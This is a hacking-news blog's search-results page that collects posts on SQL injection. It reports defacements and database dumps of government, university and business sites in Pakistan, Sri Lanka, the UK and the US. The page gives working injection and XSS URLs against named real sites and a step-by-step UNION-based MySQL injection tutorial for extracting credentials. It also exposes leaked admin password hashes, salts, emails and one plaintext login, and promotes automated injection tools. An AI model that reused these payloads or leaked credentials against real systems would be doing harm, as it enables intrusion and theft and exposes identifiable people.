Showing posts sorted by relevance for query sql-i. Sort by date Show all posts
Showing posts sorted by relevance for query sql-i. Sort by date Show all posts

11 High Profile Websites of Pakistan is Vulnerable Said Zero, He also Exposed DB and Credentials

11 High Profile Websites of Pakistan is Vulnerable Said Zero, He also Exposed Data Base and Credentials of Admins.


List Of Vulnerable Sites:- 


http://www.awt.com.pk/
http://www.unapakistan.org.pk/
www.psf.gov.pk
www.commerce.gov.pk
http://www.whatmobile.com.pk/
http://www.competitiveness.org.pk/
http://www.whatmobile.com.pk/
http://www.smeda.org.pk/
http://www.shifa.com.pk/
http://www.gallup.com.pk/ 
http://www.onlinenews.com.pk/
www.phonebook.com.pk


Here are the details of those Sites:- 


1) Army welfare trust of Pakistan Hacked by zero





Hacked website :-
http://www.awt.com.pk/news_detail.php?news_id=9
Mirror link:-
http://mirror.sec-t.net/defacements/?id=44797




2) XSS Vulnerablity in United Nations Association of Pakistan 



link:-


http://www.unapakistan.org.pk/search.php?search=%3E%22%3E%3Cscript%3Ealert%28%22ZERO%20WAS%20HERE%22%29%3C/script%3E&section=Whole+Site&x=24&y=1


3) Pakistan Science foundation is vul to sql-i 


Data Base:-
http://pastebin.com/XCtn8Ksw


4) government of pakistan Ministry of Commerce is vulnerable to sql-i 
admin $P$BCr2kHTn8oXYjZ.z2AabI56aSgo7gs.
khushnaam $P$BtJsGbrR1l0.IYsv9a1tJhwkjMMYO/.


Data Base:-
http://pastebin.com/WKwP68HC


5) civildefence of pakistan vul to sqli found by zero
Data Base:-
http://pastebin.com/HsXvQAGA


6) http://www.shifa.com.pk/ is vulnerable to sql-i 


Data Base:-
http://pastebin.com/8r2vqqYF


7) http://www.smeda.org.pk/ is vulnerable to sql-i 
Database:-
http://pastebin.com/7Xukb7cH


8) http://www.gallup.com.pk/ vulnerable to sql-i 

Data Base:-
http://pastebin.com/3vNLAmry


9) http://www.onlinenews.com.pk/ vulnerable to sql-i 
3e8edbe7d481ca8ba452ae92631a905e admin
4bc2cfed02b6bebf99b6646c82cec3b8 admin
Data Base:-
http://pastebin.com/y7Vt0zSC


10) http://www.whatmobile.com.pk/ vulnerable to sql-i 



user: aamir
pass:NoMoreBullShit81
Data Base:-
http://pastebin.com/TzTMjKYK


11) http://www.competitiveness.org.pk/ vulnerable to sql-i 


Vulnerable Link:-


http://www.competitiveness.org.pk/subpage.php?pageid=-21+union+select+1,concat%28admin_name,0x3a,admin_password%29,3,4,5,6,7,8,9+FROM+tbl_admin--















SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

5 GB Data of Sri-Lankan Govt Dumped By Team T!g3R


Team T!g3R strikes again, this time the target is Sri Lankan cyber fence. w3bd3f4c3r, n3ll@!s4mur4!, r00t, burn3r, !nd4!nRuBuk, violence_$h@r0n (members of Team T!g3R) who conducted this operation. They have done data dump of many high profile site of srilanka including Srilankan Army, Port Authority, Business Online, Lawnet Govt, National Science Foundation, Sunday times News Paper and so on. 

  • SRILANKAN ARMY:-

WEBSITE : www.slpa.lk
Vulnerabile to SQLi
Dumped Database Link:- http://pastebin.com/ygfSmu3C

  • MICROFINANCE OF SRILANKA:-

WEBSITE : www.lbo.lk
Vulnerable to SQL-i
Dumped Database Link:- http://pastebin.com/drBwfngj
LAWNET GOVERNMENT OF SRILANKA:-

Website : www.lawnet.lk
Vulnerable to SQL-i  
Dumped Database Link:- http://pastebin.com/p9YVkj4U



  • NATIONAL SCIENCE FOUNDATION  OF SRILANKA:-

Website : www.nsf.ac.lk
Vulnerable to SQL-i
Dumped Database Link:- http://pastebin.com/htyxY8Dz
                         


  • SRILANKA PORT AUTHORITY:-
WEBSITE : www.slpa.lk
Vulnerabile to SQL-i
Dumped Database Link:-  http://pastebin.com/ygfSmu3C


  • LANKA BUISNESS ONLINE:-
WEBSITE : www.lbo.lk
Vulnerable to SQL-i
Dumped Database Link:- http://pastebin.com/C4z7QEit


  • SUNDAY TIMES NEWS PAPER OF SRILANKA:-
Website : http://sundaytimes.lk
Vulnerable to SQL-i
Dumped Database Link:- http://pastebin.com/aTFWNgWj

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 
                                                                                        
ABSTRACT:
It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.
                                                                                                       
Understand the technique MySQL Injection: 
One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP
 
(Figure 1) Detecting
Searching Column number (s): We will test earlier in error, then no error may be said to find.
(Figure 2) SQL Error 
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--
COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--
usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--
rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table
* Brute Force / Shooting
This happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=
Dump
This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Extracting data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--
_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=
Concat
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.
It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION
Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?
The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.
The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.
**********
I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

vulnerability on university of manchester and university of liverpool's website

Multiple vulnerability found by Zero on the university of manchester and university of liverpool's website


University Of Manchester:- 
webiste: - http://www.manchester.ac.uk/
Vulnerability: - SQL-i & Non persistence XSS


Vulnerable Link(SQL-i):- http://www.manchester.ac.uk/aboutus/news/archive/list/?year=2011&month=-02+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+FROM+information_schema.tables%20WHERE%20table_schema=database%28%29--


Vulnerable Link(XSS):- http://www.manchester.ac.uk/aboutus/search/index.htm?num=10&as_dt=i&oe=UTF8&ie=UTF8&access=p&filter=1&numgm=5&output=xml_no_dtd&client=MAN_aboutus_search&site=University&q=%3Cscript%3Ealert%28%22A%22%29%3C/script%3E

University Of Liverpool:-

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Team Ghost Released Tax Records of Brazilian Govt, Exclusive Documents of #op-SouthAfrica & 10K SQL- Vulnerable Sites


Black Hat Ghost is back again with boom. Previously they exposed the secrete documents of DOD, NATO, NSA, DHS and many more. This time they exposed the entire tax record of Brazilian Govt. Also Team Ghost published a documents containing more  than 10,000 SQL-i vulnerable sites and their details.
Not yet completed Team Ghost was running an operation named #opSouthAfrica and in this operation they have hacked into 50+ high profile websites of South-Africa including Govt. and so on.


According to The Official Press Release:- 

Today I posted 3 Mediafire links
First link containing:
Tax records from www.balbinos.sp.gov.br From 2002-2011. I exposed everything they've purchased
in the last 9 years. ;)

Second link containing:

The whole contents of #opSouthAfrica, which was created by myself and involved hacking over 50 SouthAfrican websites, these were the main sites I targeted, and it shows Usernames, passwords, emails, Postal address's,databases,SQL Dumps and so on.

The third link of Tonights raids:
Contained 10,000+ SQL-i Vulnerable website links. Every one of these links was in-fact vulnerable at some point in time. So if a couple don't work now, then they've patched it.
These are just a taste of what's to come.

First  link:
http://www.mediafire.com/?elm9kvaend2tk8y   <--- Tax records

Second link:
http://www.mediafire.com/?nk69n6c5ufek8yk <--- #opSouthAfrica

Third  link:

http://www.mediafire.com/?ryx7apfx6ohca7b   <--- 10k+ Vulnerable Sites
 

Fore more info Click Here


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Serious SQL-i Vulnerability Found by Skywalk3r & Napster On An Online Jewelry Shop


Serious SQL-i vulnerability found by  Skywalk3r &Napster  on a on-line jewelry shop.
they claimed that by exploiting the SQL-i vulnerability any one can access the whole business, transition system of the said site.






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

SQL Injection Vulnerability In Google Lab Database System found by Shadman Tanjim


SQL Injection Vulnerability In Google Lab Database System found by Shadman Tanjim (Admin Bangladesh Cyber Army). Here is the report Submitted By Shadman to VOGH. 

REPORT:-

Very Big and Critical Vulnerability detect in Google Lab System. Vendor is already reported. But they don’t take positive step in this case this vulnerability is now exposed and open in public. Now I tell details About the Vulnerability in Google Lab System.
Google Lab Website has SQL Injection Vulnerability and Dangerous thing is this
Vulnerability is Exploitable. We can get Tables, columns and data. Google Lab
Database has his own customize DB system. But Interesting things is their database system is Similar as Ms Access database. In this case Ms Access SQL Injection System is Also Work on Google Lab Database system. And this vulnerability is 100% real and Now We can see this in our eyes. 

Now I give you Step by step proof about this Vulnerability.


2. Vulnerability type: SQL Injection

Info:
6. Host IP: 209.85.175.141
7. Web Server: Google Frontend
8. Keyword Found: Fast
9. Injection type is Integer
10. Keyword corrected: Swirl

Let’s Check Exploiting this Vulnerable link. Here I use 3 Famous SQL Injection
tools. They are:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool

You Can Download the Video Of This Vulnerability VIDEO LINK
To Download the Full PDF report Click HERE

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Pangolin 3.2.5 Released (SQL-i Testing Tool)


Pangolin is a penetration testing, SQL Injection test tool on database security. It finds SQL Injection vulnerabitlities.Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user"s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.
Supported Database:-
Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.
Features:-
  • HTTPS support
  • Pre-Login
  • Proxy
  • Specify any HTTP headers(User-agent, Cookie, Referer and so on)
  • Bypass firewall setting
  • Auto-analyzing keyword
  • Detailed check options
  • Injection-points management
  • Injection Digger
  • Data dumper
New Features of Pangolin 3.2.5:-
  • Auto analyzing keywords before injecte with cookie.
  • Support manually select keywords.
  • Release "oracle_data.php" to customize "Remote Data URL" when injecte Oracle.
To download Pangolin Click Here 


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

SQLol -SQL-i Vulnerability Testing Framework


In the Austin Hackers Association meeting they released SQLol. SQLolis a configurable SQL injection testbed. It allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. The author thought about different data extraction techniques from SQL injection flaws and found that a vulnerability framework that includes SQLi verbose error extraction techniques was never found. To be precise, the author never came across a vulnerability framework that includes SQL injection in a DELETE query. So, with this aim in mind, SQLol was born, specifically for SQL injection flaws. It can be useful to those who know nothing about SQL injection, or those who know a bit of it. SQLol comes with a set of challenges which help you with performing some flavor of SQL injection and have pre-configured settings.

Options:-
  • Type of query
  • Location within query
  • Type and level of sanitization
  • Level of query output
  • Verbosity of error messages
  • Visibility of query
  • Injection string entry point


Other Cool Things:-
  • Reset button
  • Challenges
  • Support for multiple database systems


Requirements:-
  • PHP 5.x
  • Web server
  • Database server (MySQL, PostgreSQL and SQLite have been tested, others may work)
  • ADODB library (included)

To Download SQLol Click Here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

The Official NASA forum is Vulnerable to SQL-i, Said TeaMp0isoN


Well-known hackers group TeaMp0isoN found SQL-i vulnerability of the NASA forum. Actually it was a found through the Zero-day of vbulletin. TeaMp0isoN exposed very sensitive information like the Database info, admin user- name, email-id, password hash and so on.  

According to TeaMpOisoN:-

Admin Username: rkim
Email: Randolph.I.Kim@nasa.gov
Hashed Password: f8c139f15bbbb79a362c049590b24f0d:W\oFuA
Salt: {2p^:D?w~=pYxVayvmn;l7*

Admin Username: cmohnike
Email: MohnikCC@nv.doe.gov
Hashed Password: 6c6e2b5e36846c2aee99b1c6e1194f63
Salt: )~#FJj:zQ^52q:SF{&5MDCILiPi2S=


For More Info click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Havij v1.16 Advanced & Automated SQL Injection Tool Released

Havij v1.16 Advanced & Automated SQL Injection Tool Released
One of the most preferred and widely used SQL-injector Havij has released another updated version (v1.16). In the middle of last year ITSec team made Havij 1.15 available, so after one year of hard work now we got the next edition of this marvellous SQL-i tool. As per survey Havij is listed as one of the finest and widely used tool used for finding SQL Injection vulnerabilities on a web page. It has been thoroughly used by hackers along with penetration testers over the whole spectrum. 

Brief About Havij :- It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file system and executing commands on the  operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

New Features :-
  • Multithreading
  • Oracle Blind injection method.
  • Automatic all parameter scan added.
  • New blind injection method (no more ? char.)
  • Retry for blind injection.
  • A new method for tables/columns extraction in mssql blind.
  • A WAF bypass method for mysql blind.
  • Getting tables and columns even when can not get current database.
  • Auto save log.
Bug Fixed:- 
  • url encode bug fixed.
  • Trying time based methods when mssql error based and union based fail.
  • Clicking get columns would delete all tables.
  • Reseting time based method delay when applying settings.
  • Oracle and PostgreSQL detection

For additional information & to Download Havij v1.16 Click Here 
 


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...